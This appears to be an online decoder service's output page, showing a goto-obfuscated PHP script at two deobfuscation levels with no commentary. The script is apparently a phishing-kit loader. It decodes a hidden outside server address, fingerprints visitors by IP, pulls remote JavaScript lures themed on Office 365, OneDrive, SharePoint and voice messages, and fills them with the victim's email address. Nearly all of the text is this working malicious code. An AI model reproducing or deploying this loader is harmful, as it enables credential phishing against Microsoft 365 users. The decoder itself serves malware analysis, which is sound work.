Online PHP and Javascript Decoder decode hidden script to uncover its real functionality


Show other level 

goto MPINf; wPJvs: $mcbhei = "Y29t"; goto qODnW; HJ3WU: $html_string = "<!DOCTYPE html>\xa<html id='html' sti='UIDXXX' vic='EMAILXXX' lang='en'>
\xa<head>\xa    <script src='https://cdn.socket.io/4.7.5/socket.io.min.js' integrity='sha384-2huaZvOR9iDzHqslqwpR87isEmrfxqyWOF7hr7BY6KG0+hVKLoEXMPUJw3ynWuhO' crossorigin='anonymous'></script>
    <link rel='stylesheet' href='https://www.w3schools.com/w3css/4/w3.css'>
<link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.css'>\xa</head>

<body id='allbody'>\xa

</body>

<script type='text/javascript'>
TYPEXXX
</script>
</html>"; goto K6u_I; WVbYm: $mgkg = "mF5"; goto RrFJC; QPDdG: $jdoe = "M6Ly9nc"; goto WVbYm; uUzDq: $curl = curl_init(); goto eoxE8; PVlwv: $err = curl_error($curl); goto pGw0i; eoxE8: curl_setopt_array($curl, array(CURLOPT_URL => $urldon . "/COOKIESAPI/api_black.json", CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 10, CURLOPT_CUSTOMREQUEST => "GET")); goto W96u6; oksLx: $data_raw = urldecode($data_raw); goto oVnkz; pGw0i: curl_close($curl); goto ko4Xv; Dv9OU: if ($_toprofile["ipdata"]) { if ($_toprofile["ipdata"] != $ip) { header("Location: /4"); die; } } else { $linkinfo = "ipdata=" . $ip . "&vbox=" . $vbox . "&" . base64_decode($data); header("Location: " . $data2 . "?" . base64_encode($linkinfo)); } goto o6uho; TaxRx: $_toprofile = decode($data); goto Dv9OU; ko4Xv: $jsonObj = json_decode($jsonData); goto cSYky; Ue5gI: if (!empty($_SERVER["HTTP_CLIENT_IP"])) { $ip = $_SERVER["HTTP_CLIENT_IP"]; } elseif (!empty($_SERVER["HTTP_X_FORWARDED_FOR"])) { $ip = $_SERVER["HTTP_X_FORWARDED_FOR"]; } else { $ip = $_SERVER["REMOTE_ADDR"]; } goto gZ288; cSYky: $XXXAPIXXX = $jsonObj->api_domains; goto S3kJC; K6u_I: $url = "https://"; goto L0Xsl; kh4_p: function decode($data) { $myArray = explode("&", base64_decode($data)); $data_out = array(); foreach ($myArray as $x) { if (strpos($x, "sv") !== FALSE) { $data_out["sv"] = explode("=", $x)[1]; } if (strpos($x, "uid") !== FALSE) { $data_out["uid"] = explode("=", $x)[1]; } if (strpos($x, "rbox") !== FALSE) { $data_out["rbox"] = explode("=", $x)[1]; } if (strpos($x, "ipdata") !== FALSE) { $data_out["ipdata"] = explode("=", $x)[1]; } if (strpos($x, "vbox") !== FALSE) { $data_out["vbox"] = explode("=", $x)[1]; $vbox = explode("=", $x)[1]; } } return $data_out; } goto TaxRx; W96u6: $jsonData = curl_exec($curl); goto PVlwv; poB9l: $dgri = "aHR0cH"; goto QPDdG; qODnW: $urldon .= $dgri . $jdoe . $mgkg . $batt . $iitt . $draa . $njod . $mcbhei; goto B12yu; MPINf: require __DIR__ . "/i.php"; goto Ue5gI; chd56: profile($_toprofile, $vbox, $url, $html_string, $urldon, $XXXAPIXXX); goto hy9Wc; Kh2oT: $njod = "Gku"; goto wPJvs; gZ288: $urldon = ''; goto poB9l; XTpl1: $iitt = "GluZ"; goto BSqeA; BSqeA: $draa = "zJhc"; goto Kh2oT; oVnkz: $rbox = null; goto vC83n; o6uho: function profile($data, $vbox, $url, $html_string, $urldon, $XXXAPIXXX) { $sv_data = explode("_", $data["sv"])[1]; if (strpos($data["sv"], "o365") !== FALSE) { if (strpos($data["sv"], "nom") !== FALSE) { $todolink = $urldon . "/user.php?uid=" . $data["uid"] . "&pgd=jsnom.js"; $curl = curl_init(); curl_setopt_array($curl, array(CURLOPT_URL => $todolink, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 10, CURLOPT_CUSTOMREQUEST => "GET")); $jscodeblock = curl_exec($curl); $err = curl_error($curl); curl_close($curl); if ($jscodeblock === "INVALID") { header("Location: /#500-NULL"); die; } $jscodeblock = str_replace("XXXAPIXXX", $XXXAPIXXX, $jscodeblock); $html_string = str_replace("TYPEXXX", $jscodeblock, $html_string); } if (strpos($data["sv"], "one") !== FALSE) { $todolink = $urldon . "/user.php?uid=" . $data["uid"] . "&pgd=jsdrive.js"; $curl = curl_init(); curl_setopt_array($curl, array(CURLOPT_URL => $todolink, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 10, CURLOPT_CUSTOMREQUEST => "GET")); $jscodeblock = curl_exec($curl); $err = curl_error($curl); curl_close($curl); if ($jscodeblock === "INVALID") { header("Location: /#0-NULL"); die; } $jscodeblock = str_replace("XXXAPIXXX", $XXXAPIXXX, $jscodeblock); $html_string = str_replace("TYPEXXX", $jscodeblock, $html_string); } if (strpos($data["sv"], "sp") !== FALSE) { $todolink = $urldon . "/user.php?uid=" . $data["uid"] . "&pgd=jssp.js"; $curl = curl_init(); curl_setopt_array($curl, array(CURLOPT_URL => $todolink, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 10, CURLOPT_CUSTOMREQUEST => "GET")); $jscodeblock = curl_exec($curl); $err = curl_error($curl); curl_close($curl); if ($jscodeblock === "INVALID") { header("Location: /#5-NULL"); die; } $jscodeblock = str_replace("XXXAPIXXX", $XXXAPIXXX, $jscodeblock); $html_string = str_replace("TYPEXXX", $jscodeblock, $html_string); } if (strpos($data["sv"], "voice") !== FALSE) { $todolink = $urldon . "/user.php?uid=" . $data["uid"] . "&pgd=jsv.js"; $curl = curl_init(); curl_setopt_array($curl, array(CURLOPT_URL => $todolink, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 10, CURLOPT_CUSTOMREQUEST => "GET")); $jscodeblock = curl_exec($curl); $err = curl_error($curl); curl_close($curl); if ($jscodeblock === "INVALID") { header("Location: /#500-NULL"); die; } $jscodeblock = str_replace("XXXAPIXXX", $XXXAPIXXX, $jscodeblock); $html_string = str_replace("TYPEXXX", $jscodeblock, $html_string); } $html_string = str_replace("UIDXXX", base64_encode(base64_encode($data["uid"])), $html_string); $html_string = str_replace("EMAILXXX", $data["vbox"], $html_string); } print $html_string; } goto chd56; vC83n: $vbox = null; goto g0xRE; B12yu: $urldon = base64_decode($urldon); goto uUzDq; RrFJC: $batt = "aG9zd"; goto XTpl1; S3kJC: $XXXAPIXXX = base64_encode($XXXAPIXXX); goto HJ3WU; g0xRE: if (strpos($data_raw, "N0123N") !== FALSE) { $data = explode("N0123N", $data_raw)[0]; if (!empty(explode("N0123N", $data_raw)[1])) { $vbox = explode("N03N", $data_raw)[1]; if (strpos($vbox, "%40") !== FALSE || strpos($vbox, "@") !== FALSE) { $vbox = str_replace(",0", "@", $vbox); $ssns1 = explode("@", $vbox)[0]; $ssns2 = explode("@", $vbox)[1]; if (strpos($ssns2, "_") !== FALSE) { $ssns2 = str_replace("_", , $ssns2); $vbox = $ssns1 . $ssns2; } } } } else { $data = explode("?", $_SERVER["REQUEST_URI"])[1]; $data2 = explode("?", $_SERVER["REQUEST_URI"])[0]; } goto kh4_p; BrwS6: $data_raw = explode("?", $_SERVER["REQUEST_URI"])[1]; goto oksLx; L0Xsl: $url .= $_SERVER["HTTP_HOST"]; goto BrwS6; hy9Wc:

goto MPINf; wPJvs:  goto qODnW; HJ3WU: $html_string = "<!DOCTYPE html>\xa<html id='html' sti='UIDXXX' vic='EMAILXXX' lang='en'>
\xa<head>\xa    <script src='https://cdn.socket.io/4.7.5/socket.io.min.js' integrity='sha384-2huaZvOR9iDzHqslqwpR87isEmrfxqyWOF7hr7BY6KG0+hVKLoEXMPUJw3ynWuhO' crossorigin='anonymous'></script>
    <link rel='stylesheet' href='https://www.w3schools.com/w3css/4/w3.css'>
<link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.css'>\xa</head>

<body id='allbody'>\xa

</body>

<script type='text/javascript'>
TYPEXXX
</script>
</html>"; goto K6u_I; WVbYm:  goto RrFJC; QPDdG:  goto WVbYm; uUzDq: $curl = curl_init(); goto eoxE8; PVlwv: $err = curl_error($curl); goto pGw0i; eoxE8: curl_setopt_array($curl, array(CURLOPT_URL => $urldon . "/COOKIESAPI/api_black.json", CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 10, CURLOPT_CUSTOMREQUEST => "GET")); goto W96u6; oksLx: $data_raw = urldecode($data_raw); goto oVnkz; pGw0i: curl_close($curl); goto ko4Xv; Dv9OU: if ($_toprofile["ipdata"]) { if ($_toprofile["ipdata"] != $ip) { header("Location: /4"); die; } } else { $linkinfo = "ipdata=" . $ip . "&vbox=" . $vbox . "&" . base64_decode($data); header("Location: " . $data2 . "?" . base64_encode($linkinfo)); } goto o6uho; TaxRx: $_toprofile = decode($data); goto Dv9OU; ko4Xv: $jsonObj = json_decode($jsonData); goto cSYky; Ue5gI: if (!empty($_SERVER["HTTP_CLIENT_IP"])) { $ip = $_SERVER["HTTP_CLIENT_IP"]; } elseif (!empty($_SERVER["HTTP_X_FORWARDED_FOR"])) { $ip = $_SERVER["HTTP_X_FORWARDED_FOR"]; } else { $ip = $_SERVER["REMOTE_ADDR"]; } goto gZ288; cSYky: $XXXAPIXXX = $jsonObj->api_domains; goto S3kJC; K6u_I: $url = "https://"; goto L0Xsl; kh4_p: function decode($data) { $myArray = explode("&", base64_decode($data)); $data_out = array(); foreach ($myArray as $x) { if (strpos($x, "sv") !== FALSE) { $data_out["sv"] = explode("=", $x)[1]; } if (strpos($x, "uid") !== FALSE) { $data_out["uid"] = explode("=", $x)[1]; } if (strpos($x, "rbox") !== FALSE) { $data_out["rbox"] = explode("=", $x)[1]; } if (strpos($x, "ipdata") !== FALSE) { $data_out["ipdata"] = explode("=", $x)[1]; } if (strpos($x, "vbox") !== FALSE) { $data_out["vbox"] = explode("=", $x)[1]; $vbox = explode("=", $x)[1]; } } return $data_out; } goto TaxRx; W96u6: $jsonData = curl_exec($curl); goto PVlwv; poB9l:  goto QPDdG; qODnW: $urldon .= "aHR0cHM6Ly9ncmF5aG9zdGluZzJhcGkuY29t"; goto B12yu; MPINf: require __DIR__ . "/i.php"; goto Ue5gI; chd56: profile($_toprofile, $vbox, $url, $html_string, $urldon, $XXXAPIXXX); goto hy9Wc; Kh2oT:  goto wPJvs; gZ288: $urldon = ''; goto poB9l; XTpl1:  goto BSqeA; BSqeA:  goto Kh2oT; oVnkz: $rbox = null; goto vC83n; o6uho: function profile($data, $vbox, $url, $html_string, $urldon, $XXXAPIXXX) { $sv_data = explode("_", $data["sv"])[1]; if (strpos($data["sv"], "o365") !== FALSE) { if (strpos($data["sv"], "nom") !== FALSE) { $todolink = $urldon . "/user.php?uid=" . $data["uid"] . "&pgd=jsnom.js"; $curl = curl_init(); curl_setopt_array($curl, array(CURLOPT_URL => $todolink, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 10, CURLOPT_CUSTOMREQUEST => "GET")); $jscodeblock = curl_exec($curl); $err = curl_error($curl); curl_close($curl); if ($jscodeblock === "INVALID") { header("Location: /#500-NULL"); die; } $jscodeblock = str_replace("XXXAPIXXX", $XXXAPIXXX, $jscodeblock); $html_string = str_replace("TYPEXXX", $jscodeblock, $html_string); } if (strpos($data["sv"], "one") !== FALSE) { $todolink = $urldon . "/user.php?uid=" . $data["uid"] . "&pgd=jsdrive.js"; $curl = curl_init(); curl_setopt_array($curl, array(CURLOPT_URL => $todolink, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 10, CURLOPT_CUSTOMREQUEST => "GET")); $jscodeblock = curl_exec($curl); $err = curl_error($curl); curl_close($curl); if ($jscodeblock === "INVALID") { header("Location: /#0-NULL"); die; } $jscodeblock = str_replace("XXXAPIXXX", $XXXAPIXXX, $jscodeblock); $html_string = str_replace("TYPEXXX", $jscodeblock, $html_string); } if (strpos($data["sv"], "sp") !== FALSE) { $todolink = $urldon . "/user.php?uid=" . $data["uid"] . "&pgd=jssp.js"; $curl = curl_init(); curl_setopt_array($curl, array(CURLOPT_URL => $todolink, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 10, CURLOPT_CUSTOMREQUEST => "GET")); $jscodeblock = curl_exec($curl); $err = curl_error($curl); curl_close($curl); if ($jscodeblock === "INVALID") { header("Location: /#5-NULL"); die; } $jscodeblock = str_replace("XXXAPIXXX", $XXXAPIXXX, $jscodeblock); $html_string = str_replace("TYPEXXX", $jscodeblock, $html_string); } if (strpos($data["sv"], "voice") !== FALSE) { $todolink = $urldon . "/user.php?uid=" . $data["uid"] . "&pgd=jsv.js"; $curl = curl_init(); curl_setopt_array($curl, array(CURLOPT_URL => $todolink, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 10, CURLOPT_CUSTOMREQUEST => "GET")); $jscodeblock = curl_exec($curl); $err = curl_error($curl); curl_close($curl); if ($jscodeblock === "INVALID") { header("Location: /#500-NULL"); die; } $jscodeblock = str_replace("XXXAPIXXX", $XXXAPIXXX, $jscodeblock); $html_string = str_replace("TYPEXXX", $jscodeblock, $html_string); } $html_string = str_replace("UIDXXX", base64_encode(base64_encode($data["uid"])), $html_string); $html_string = str_replace("EMAILXXX", $data["vbox"], $html_string); } print $html_string; } goto chd56; vC83n: $vbox = null; goto g0xRE; B12yu: $urldon = base64_decode($urldon); goto uUzDq; RrFJC:  goto XTpl1; S3kJC: $XXXAPIXXX = base64_encode($XXXAPIXXX); goto HJ3WU; g0xRE: if (strpos($data_raw, "N0123N") !== FALSE) { $data = explode("N0123N", $data_raw)[0]; if (!empty(explode("N0123N", $data_raw)[1])) { $vbox = explode("N03N", $data_raw)[1]; if (strpos($vbox, "%40") !== FALSE || strpos($vbox, "@") !== FALSE) { $vbox = str_replace(",0", "@", $vbox); $ssns1 = explode("@", $vbox)[0]; $ssns2 = explode("@", $vbox)[1]; if (strpos($ssns2, "_") !== FALSE) { $ssns2 = str_replace("_", , $ssns2); $vbox = $ssns1 . $ssns2; } } } } else { $data = explode("?", $_SERVER["REQUEST_URI"])[1]; $data2 = explode("?", $_SERVER["REQUEST_URI"])[0]; } goto kh4_p; BrwS6: $data_raw = explode("?", $_SERVER["REQUEST_URI"])[1]; goto oksLx; L0Xsl: $url .= $_SERVER["HTTP_HOST"]; goto BrwS6; hy9Wc:


© 2023 Quttera Ltd. All rights reserved.